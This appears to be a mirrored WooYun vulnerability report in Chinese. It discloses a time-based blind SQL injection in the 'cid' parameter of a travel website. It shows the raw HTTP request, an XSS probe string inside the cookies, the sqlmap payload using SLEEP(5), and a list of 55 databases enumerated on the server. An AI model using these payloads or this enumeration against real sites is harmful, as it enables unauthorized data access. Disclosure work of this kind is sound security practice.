乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-24: 细节已通知厂商并且等待厂商处理中 2015-09-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-08: 细节向核心白帽子及相关领域专家公开 2015-10-18: 细节向普通白帽子公开 2015-10-28: 细节向实习白帽子公开 2015-11-12: 细节向公众公开
rt
GET /listing/places?cid=1 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: PHPSESSID=o5tngg5fs509lr6fg5eeghlau3; backurl=http%3A%2F%2Fwww.**.**.**.**%2Fsearch; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2F**.**.**.**%2F; todaysidck=55fb963ca305c; referer=http%3A%2F%2F**.**.**.**%2F5343689283%2F4327695; weiboapp_login_backurl=%2Fcampaign%2Fqinghua%2F; __utmt=1; __utma=268593204.2040536378.1442551819.1442551819.1442551819.1; __utmb=268593**.**.**.**2551819; __utmc=268593204; __utmz=268593204.1442551819.1.1.utmcsr=**.**.**.**|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=3BA26C382E083970; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442563723,1442564047,1442564800,1442566102; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442566102; 2014_show=question; _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442552029%2C%22http%3A%2F%2Fwww.**.**.**.**%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f126e2a981e3a5cc.1442552029.1.1442566105.1442552029.; _pk_ses.1.07eb=*; 2014_goto=http%3A//**.**.**.**/campaign/newyear/activity/1753936%23to4; _ga=GA1.2.2040536378.1442551819; _gat=1; jiathis_uniqid=144255735255fbada8c2be2Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
cid参数存在注入
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:---Parameter: cid (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))XDvI)---web application technology: PHP 5.4.42back-end DBMS: MySQL 5.0.12
倒数第二个数据库就是途秀的
web application technology: PHP 5.4.42back-end DBMS: MySQL 5.0.12available databases [55]:[*] `minisite_xqunar\x19`[*] `performance_sp\\?81ema`[*] app[*] atlantis_campaign[*] ayana[*] b2b[*] banff2015db[*] bhrdb[*] chinatravelacademy[*] class_dhinatravelacademy[*] conference[*] cool_summer_db[*] cta_pay[*] ctb[*] ctb_apps[*] ctb_statusnet[*] ctb_ws[*] dingla[*] draweuropedb[*] dte[*] hertzintroduce[*] hirtz[*] hotelbooking[*] information_schema[*] live_meeting[*] losanheles[*] mhrdb[*] minisite_ctrip[*] minisite_czech[*] minisite_hertz[*] minisite_ihg[*] minisite_loverday[*] minisite_newyear[*] minisite_ngwworld[*] minisite_nontrealcarnival[*] minisite_phg[*] minisite_ptf[*] minisite_riviera[*] minisite_sweden_education[*] minisite_sweden_innovation[*] minisite_sweden_lifestyle[*] minisite_sweden_music[*] minisite_villaducale[*] minisite_visitgurope[*] minisitf_sweden[*] miniyite_nwbjg[*] moevenpick[*] mysql[*] opentraveldatabase[*] piwik[*] service[*] sweden_show[*] test[*] tripshow[*] yioulai
危害等级:中
漏洞Rank:8
确认时间:2015-09-28 15:29
CNVD未直接复现所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无